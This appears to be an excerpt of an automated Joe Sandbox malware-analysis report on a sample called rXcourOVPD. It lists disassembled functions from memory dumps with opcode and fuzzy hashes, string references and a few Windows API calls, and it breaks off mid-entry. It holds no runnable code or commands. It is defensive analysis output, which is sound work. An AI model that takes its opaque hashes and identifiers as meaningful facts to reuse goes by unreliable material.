Instruction ID: 773df97a7e971f340037761a8700391a0a4f93602e380cbf42f831b1316530e0
Opcode Fuzzy Hash: 3447f777f4c5ff28a019fe036a7a62965b1ba8ece5f036330587da69dddd2abe
Instruction Fuzzy Hash: 01819136A00A05DFCB14DF69D888AAAB7F2FF89304B249169D405FB366D731ED41CB60

Function 05031F80 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR_q, xrefs: 05031F9C
LR_q, xrefs: 050320C9

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: LR_q$LR_q
API String ID: 0-1289077650
Opcode ID: c30a188caeb8c18246bfb1f9ad05b7e6c06bad567a12e1d5a142962f48c93ef7
Instruction ID: a45aea44ec78790d7e960ff857cd4b19757c5b097c467a3f2a5dfd004fb5f001
Opcode Fuzzy Hash: c30a188caeb8c18246bfb1f9ad05b7e6c06bad567a12e1d5a142962f48c93ef7
Instruction Fuzzy Hash: 0E81A2387001068FCB48EF78E955A6E77FAFF89604B1585A9E506DB361DB30DC02CB91

Function 050387C0 Relevance: 2.7, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(cq, xrefs: 0503899A
(&_q, xrefs: 050388DB

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: (&_q$(cq
API String ID: 0-1128674267
Opcode ID: 8da496bc79c497969eb51c1c2b70a0441c04f287f77c7657513ee0d55415de1d
Instruction ID: 9cfd3554865a4683dc7da5665870d23cfe6b46adcfbe5b96a7f79d3b81f5e0ef
Opcode Fuzzy Hash: 8da496bc79c497969eb51c1c2b70a0441c04f287f77c7657513ee0d55415de1d
Instruction Fuzzy Hash: 4671AF31F002199BDB15DFA8D850AAEBBF6BFC8700F148569E506A7380EF34AD06C791

Function 00E43428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xcq, xrefs: 00E43435
Xcq, xrefs: 00E4345E

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: Xcq$Xcq
API String ID: 0-1149048318
Opcode ID: 405410d04f23d245c776cd545afc38ecfa73940552948d5aaf5ef3650f4b8dba
Instruction ID: 35660f9940f5ebd81bbbcee0b6f97c7f6e49da14411bcf9666a72509a9b758be
Opcode Fuzzy Hash: 405410d04f23d245c776cd545afc38ecfa73940552948d5aaf5ef3650f4b8dba
Instruction Fuzzy Hash: 51314875B003248BDF1D9A7AA9842BE65DABBC4314F24143ED817E3384DF78CE058761

Function 055FB390 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3767143605.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_55f0000_rXcourOVPD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5f0c37453f1a0dea3c4eac0ddd2f04059296352778261a7cc7edfa8dce1a8e32
Instruction ID: e936515e57d3b701af783f6bd1702eb4dd17431b1443534da20ce50e5c46b6c3
Opcode Fuzzy Hash: 5f0c37453f1a0dea3c4eac0ddd2f04059296352778261a7cc7edfa8dce1a8e32
Instruction Fuzzy Hash: 4B712370A00B058FD724DF29D144B6ABBF2FF88314F10892ED58AD7A50EB75E949CB91

Function 00E40C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

LR_q, xrefs: 00E40E5E

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: LR_q
API String ID: 0-2241839734
Opcode ID: a2a5fefdc21d2858b7a95638733008aeb1e41cbfe1acc3fa3fae719493c9a8d3
Instruction ID: 8f16d73f3e3f3c18def11609b0286c7e48e76d73d2dcd1e6f424a459b82df9fa
Opcode Fuzzy Hash: a2a5fefdc21d2858b7a95638733008aeb1e41cbfe1acc3fa3fae719493c9a8d3
Instruction Fuzzy Hash: B122CB7890021ADFCB54EF64E995B9DBBB2FF48301F1086A6D809A7359DB306D86CF50

Function 00E40CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LR_q, xrefs: 00E40E5E

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: LR_q
API String ID: 0-2241839734
Opcode ID: 46a9fd8b77ed654d4b4dac5ee9d957caa9f2919de41aec911a879df295e2f052
Instruction ID: 43d9dd262bd8b7f1237005871cd0a9474721e00debb6626b07ab845d0031f836
Opcode Fuzzy Hash: 46a9fd8b77ed654d4b4dac5ee9d957caa9f2919de41aec911a879df295e2f052
Instruction Fuzzy Hash: 7222CB7890021ADFCB54EF64E995B9DBBB2FF48301F1086A6D809A7359DB306D86CF50

Function 055FD564 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055FD682

Memory Dump Source

Source File: 00000014.00000002.3767143605.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_55f0000_rXcourOVPD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8f3ca3a81a8ef74a9bf9c92a3f7ec63e465d1d49f8b4a51f4dd76df0dfc0efb9
Instruction ID: 0cde9e19e4c95973b76f58d99ba802ad0bef3bc2d637093b7ba6094a87c56ba5
Opcode Fuzzy Hash: 8f3ca3a81a8ef74a9bf9c92a3f7ec63e465d1d49f8b4a51f4dd76df0dfc0efb9
Instruction Fuzzy Hash: AE51C0B1C00349AFDB14CFA9C984ADEBFB5BF48314F24812AE919AB250D7749985CF91

Function 055FA92C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055FD682

Memory Dump Source

Source File: 00000014.00000002.3767143605.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_55f0000_rXcourOVPD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c00d7d2fe5f1e74a66c25e212ac1d43da7bce7246a7534b911623c6446ad121f
Instruction ID: c47b4c63d38750b6e4471e29bedc3ec802d2add9c347922a9cde1e5e8dbd0f1f
Opcode Fuzzy Hash: c00d7d2fe5f1e74a66c25e212ac1d43da7bce7246a7534b911623c6446ad121f
Instruction Fuzzy Hash: EA51CFB1D003499FDB14DFA9C984ADEBBB5FF48314F24812AE919AB210D774A845CF91

Function 055FE484 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 055FFD71

Memory Dump Source

Source File: 00000014.00000002.3767143605.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_55f0000_rXcourOVPD.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7943665f1b1e6d6b024e0e1180a6ac2e71b50797603db5e2b1b338f78682fd29
Instruction ID: cae5e2c0ffc4eb905f760d29f93fd68bc42b8af2a4d97bc07c5e0eaeabfb98d7
Opcode Fuzzy Hash: 7943665f1b1e6d6b024e0e1180a6ac2e71b50797603db5e2b1b338f78682fd29
Instruction Fuzzy Hash: 5A4149B5900309DFCB54DF99C488AAABBF5FF88314F25C859D619AB321D734A841CFA0

Function 055FA770 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,055FB3AC), ref: 055FB5E6

Memory Dump Source

Source File: 00000014.00000002.3767143605.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_55f0000_rXcourOVPD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f4af29f66c576e1fcfed4b1c7c5316464c7ea0411273cdb5905dee25c9754b91
Instruction ID: 3b8b12320b60a7943ff82393ba71709bb3d2c268b02178f23f2291cda80d49c3
Opcode Fuzzy Hash: f4af29f66c576e1fcfed4b1c7c5316464c7ea0411273cdb5905dee25c9754b91
Instruction Fuzzy Hash: 33113FB1C00249CFCB20DFAAD444A9EFBF4FB88320F10846AD919B7210E379A545CFA1

Function 00E4A650 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

(o_q, xrefs: 00E4A7D9

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: (o_q
API String ID: 0-493409505
Opcode ID: 1eee0db894edaea9e65e9394bf657e98b03aff33ee28dc4da0808b5bbef5ca56
Instruction ID: 5dbfa19149550e121efc744e945dce00812999b813f972d2e766705264c9d8a3
Opcode Fuzzy Hash: 1eee0db894edaea9e65e9394bf657e98b03aff33ee28dc4da0808b5bbef5ca56
Instruction Fuzzy Hash: BA41E239B003549FC715AF68D848AAE7BF6AFC9710F144469E506D7391DE359C01C7A1

Function 00E4A818 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cc0d2db611797d8e6acae47f2f308158059ece590a0b954fe3a291c230dd8f
Instruction ID: bf6d75b38ea9dd4a45ec6419321be7b9a4b8c95f836ff0c4ba3a05f1672fbad1
Opcode Fuzzy Hash: 74cc0d2db611797d8e6acae47f2f308158059ece590a0b954fe3a291c230dd8f
Instruction Fuzzy Hash: 86F11C75A402158FCB04CF6DE9849ADBBF2FF88324B1A9069E515EB361CB35EC41CB61

Function 00E47438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbc930f0ce47f6d8e136715a6f23ef3c2b9c2ef12c66485fb7d76916db74aa5
Instruction ID: da6cb4fbc0f9354278d63a19b91e3e91236d219aca21f6cb7b46f2797d06ebcd
Opcode Fuzzy Hash: 7dbc930f0ce47f6d8e136715a6f23ef3c2b9c2ef12c66485fb7d76916db74aa5
Instruction Fuzzy Hash: D57139347086158FCB14DF28E488AAA7BE6AF49304F1550A9E856EB3B1DB74EC41CBD1

Function 00E4CEC7 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc9f12965ceffb36a5938c399413dac7de9c79994eb53b5946ca250000f857c
Instruction ID: 57500a3a1a0390871040dff3a7f0d3fb586b747040f3c90c54c04b8e43baab0f
Opcode Fuzzy Hash: 9dc9f12965ceffb36a5938c399413dac7de9c79994eb53b5946ca250000f857c
Instruction Fuzzy Hash: 8D51A4388A1723CFD7043F60B5AC16E7BA1FB0F317748AD44A81EC51A5AB7850A5CE62

Function 00E4CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bc11c7b53e62084ee7702867d24032dcbfd50720a86451e7b56f78aa257e96
Instruction ID: 8f000127c45f0ff3a157fadcbdc77b24a7196389d3f7dc92401831987a72521c
Opcode Fuzzy Hash: c3bc11c7b53e62084ee7702867d24032dcbfd50720a86451e7b56f78aa257e96
Instruction Fuzzy Hash: 4A51B7388A1723CFD6043F60B5AC07E7BA5FB0F317748AC44A91EC51A5AB7850A5CA62

Function 00E4D59F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d32849b8f21bea2bb3c1789c257a7d0e5defd6bfad1a7ef66545cb002eec4f51
Instruction ID: a3e8c58b21ed8f009e7976cf5276c48b6506dd3d4207b4bbb1917ecf6aa6f58b
Opcode Fuzzy Hash: d32849b8f21bea2bb3c1789c257a7d0e5defd6bfad1a7ef66545cb002eec4f51
Instruction Fuzzy Hash: 87612438D01319DFDB15DFA4D954AADBBB2FF88304F208529E805AB399DB34594ACF40

Function 05031D30 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27518b0c9d11e4b2952af19c65263a7e5003e678fec8cb9dfb140401c049649
Instruction ID: 34f55a2b6a1d9fa65ee5032c17a74f31de48afac3024441fb2136853e8a37f02
Opcode Fuzzy Hash: c27518b0c9d11e4b2952af19c65263a7e5003e678fec8cb9dfb140401c049649
Instruction Fuzzy Hash: A9510374744215DFC758EF69E89697E77BAFB483587010864E806DB3A8DB31EC06CB90

Function 00E4CD10 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e5f56add1c8aa6d25ec16c65389b51fbd2fd2ad0e867ca8ac92091b64b69bb
Instruction ID: ae743c4b2f1761d2f6340a7b758be8b730320d95fc6a427aa1aad38393119df9
Opcode Fuzzy Hash: 60e5f56add1c8aa6d25ec16c65389b51fbd2fd2ad0e867ca8ac92091b64b69bb
Instruction Fuzzy Hash: 8F519474E01208DFDB44DFA9D5849DDBBF2BF89300F20916AE819AB365DB309901CF50

Function 00E438F9 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115e562becb62857a9d936009af93379731446051c41e834dedd5685a491344f
Instruction ID: 4a794d272f951f279f9cf9a69bd1197561cf8a1dd979ef6e4c92aa1c8cfcdfa9
Opcode Fuzzy Hash: 115e562becb62857a9d936009af93379731446051c41e834dedd5685a491344f
Instruction Fuzzy Hash: 1D519575E01208DFCB48DFA9D59499DBBF2FF89300B209569E805BB365DB31A946CF40

Function 0503C638 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a9c0c4392684549c5b98b6c2a3388422c3501447f3bfa79433d740b90e41873
Instruction ID: 4c87a5516e7831fbff1982f692b09ca0c483f33da9fe4e7166f6326804c5bff5
Opcode Fuzzy Hash: 3a9c0c4392684549c5b98b6c2a3388422c3501447f3bfa79433d740b90e41873
Instruction Fuzzy Hash: F4415E31901319DFDB44AFA0E45D7EE7BB1FB4A315F105825D206A62D4DBB80A89CFA1

Function 00E43908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf9dab4da3e9f32874a32d15f0d48689f7e0f3a09ee0520212ecc34dc4c6278
Instruction ID: 3f17ab0cfb559bc09a3bb20a9def1dec1455b75f74c086eb8c77323842d17669
Opcode Fuzzy Hash: ebf9dab4da3e9f32874a32d15f0d48689f7e0f3a09ee0520212ecc34dc4c6278
Instruction Fuzzy Hash: 88517375E01208DFCB48DFA9D59499DBBF2FF89310B209469E809BB364DB31A946CF50

Function 00E4E511 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879e9242f7cd0376560f4a714b63050da0007e1da45793bb6ac33db20fd4c65a
Instruction ID: f9ca70b95af380b8106b04c8285c337184c5ae209c5e424757d441ca1ca5cb56
Opcode Fuzzy Hash: 879e9242f7cd0376560f4a714b63050da0007e1da45793bb6ac33db20fd4c65a
Instruction Fuzzy Hash: E351BB74E01228CFCB25DF68E984BEDBBB2BB49305F1055AAE409A7350D735AE85CF10

Function 00E49A63 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755d2969fa73989372f0c86bbd21e6a95c42b94db4e9ecbf15189892f06566f9
Instruction ID: 1e81796122a2889c44346e6de81638e781b8a79246c443d2a324d45136729602
Opcode Fuzzy Hash: 755d2969fa73989372f0c86bbd21e6a95c42b94db4e9ecbf15189892f06566f9
Instruction Fuzzy Hash: C451A131A04249DFCF11CFA8E884A9EBFB2FF89314F149556E811BB292D334E914DB60

Function 050387B0 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: debe66802287f55bcfb97c1187e360e84869dd2bf9406f500c0087de3f9a78be
Instruction ID: 5ab668cf858d7fc716b8a3380374024fdf0e1d0524fec940cdf755d57363b491
Opcode Fuzzy Hash: debe66802287f55bcfb97c1187e360e84869dd2bf9406f500c0087de3f9a78be
Instruction Fuzzy Hash: 11414431E012199BDB14DFA5D891ADEFBF5BF88700F28C169E505B7240EB70AD46CB91

Function 00E44DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37781777c18833d2195585becdcd0c569594da4fe90c1532a1a00599d2f9b535
Instruction ID: 4d3fdd0e06cc9a4f68e2804aa5ab8a4634341128f4383f0a9a7635727cacb33c
Opcode Fuzzy Hash: 37781777c18833d2195585becdcd0c569594da4fe90c1532a1a00599d2f9b535
Instruction Fuzzy Hash: D131C37570025A9FCF05AF64E484AAF3BA2FF88704F105415FA159B281CB79DD26DBE0

Function 0503C628 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449320885b8e2fa7394b680ecce98af5e2fe3e8b32e7b4df29b5b27348efce99
Instruction ID: 452f1e63a0438321898e42dc5e32bdf354337cbef08d20bd442c1ac7df879f31
Opcode Fuzzy Hash: 449320885b8e2fa7394b680ecce98af5e2fe3e8b32e7b4df29b5b27348efce99
Instruction Fuzzy Hash: 1031A035801319DFDB00AFA0E85D7EE7BB1FB4A315F104815D216A22D4DBB80A8ACFA1

Function 00E476D0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745178eda63f933562951a4dd9e3f56ddf7804a03c61eadd073963cf8777d78e
Instruction ID: 3144e65999de143c71cd4d157dea9f47cd289034463405008ddbfe7c6087785b
Opcode Fuzzy Hash: 745178eda63f933562951a4dd9e3f56ddf7804a03c61eadd073963cf8777d78e
Instruction Fuzzy Hash: 2821243830C3104BEB151739A89863E6B9B9FD471EB5844BBD582DB795EF288C42E3C1

Function 00E4A809 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce65c917777425ffffc975e79ccf7fecea43c4223f2c3f521c3bc83f18c1193
Instruction ID: 53df1ad052b70846b34d4d10d35d6351029180639903d578e4cd6180ac79d1e5
Opcode Fuzzy Hash: dce65c917777425ffffc975e79ccf7fecea43c4223f2c3f521c3bc83f18c1193
Instruction Fuzzy Hash: 8631B771E402158FCB04CF6DD8889AEBBF2FF85760B198165E555EB3A1C7349C42CBA1

Function 00E476E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f580910061504d1d46f64f2d3366a93abb6f6c00ce348beed53305eca6b1fd2e
Instruction ID: 2868096c5127b5d539eafce6007024c3d3b94ca4fcbcce63ce3ebffb8c5585a8
Opcode Fuzzy Hash: f580910061504d1d46f64f2d3366a93abb6f6c00ce348beed53305eca6b1fd2e
Instruction Fuzzy Hash: AE21F5383082104BEB141735E858A7E369B9FC4B1EF64547AD546DB798EF29CC42E3C1

Function 00D7D005 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3759972346.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_d7d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1752d4afd3c3868af33197db95b0a1918dc29b126bcf0fc41a467084eda326
Instruction ID: ad9047fd5b6cf4a906d18008abd5267f46e75d71dc1aed2af9dacf89a478b592
Opcode Fuzzy Hash: 0f1752d4afd3c3868af33197db95b0a1918dc29b126bcf0fc41a467084eda326
Instruction Fuzzy Hash: AD311C7550E3C08FD7038B24C9A4711BF71AF47214F1DC5DBD8898F1A7D22A980ACB62

Function 00E42060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8dca4b9e466f7dd6138ddd33c2c97c9d583d9df1f7eface2d64dd77aca3f36b
Instruction ID: abe203a4ce211430f68bb1db4a63e854a582d0fc6e7d94b8b0831df468c2049f
Opcode Fuzzy Hash: a8dca4b9e466f7dd6138ddd33c2c97c9d583d9df1f7eface2d64dd77aca3f36b
Instruction Fuzzy Hash: 70219F35A00205AFCB14DF74D450AAE77A5EF98754B90C41DE949AB340DA31EE42CBD2

Function 00E45A63 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4968b40fc95e15f99428d5f6509b1bbfc49739b2519ac4502d316a2ce932662
Instruction ID: 070624e0f8e5a1d3aeb898cff9db7c7e9864eac2b33fb30e00ca2421bfbec661
Opcode Fuzzy Hash: e4968b40fc95e15f99428d5f6509b1bbfc49739b2519ac4502d316a2ce932662
Instruction Fuzzy Hash: A1210735704B218FD7199B24D4A452FBBA2EF857547158669E906DB392CE34DC02C7D0

Function 00C8D404 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3759684417.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c8d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a104291c2b2f543ad194fff40d24f0ce226bd829f86dbcb70d286030c09544fd
Instruction ID: 1ec41654033263bb6fd168fea847732c77dfcb2c693c98859d4c39fa101d27d4
Opcode Fuzzy Hash: a104291c2b2f543ad194fff40d24f0ce226bd829f86dbcb70d286030c09544fd
Instruction Fuzzy Hash: 49212571504244EFDB05EF54D9C0F26BF65FBD8328F20C5A9E90A0B296C336E856C7A5

Function 00D7D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3759972346.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_d7d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7116e2484820f4f308edcb8663cc8015a10bbb02631b710b6e7742be9daa6632
Instruction ID: 53fa052659d5daae752b0d6946f538323a0b0bbb845c74c6c8020c179d0fb195
Opcode Fuzzy Hash: 7116e2484820f4f308edcb8663cc8015a10bbb02631b710b6e7742be9daa6632
Instruction Fuzzy Hash: BA21D0715042049FCB14DF24C984B26BB76FF84314F24C5A9E84D4B296D77AD846CA71

Function 00E439ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0428680c33cac631af5339d9d184f1a42beee52a0a95dca9e86c2697efb585
Instruction ID: d5c188ed56d822daf0b593c11c4917bc45bfec6581c918fe93c2ecd46b72f783
Opcode Fuzzy Hash: db0428680c33cac631af5339d9d184f1a42beee52a0a95dca9e86c2697efb585
Instruction Fuzzy Hash: 7E31A878E11308DFCB44DFA8E59499DBBB2FF49305B20946AE809AB364DB31AD05CF40

Function 00E44DBB Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

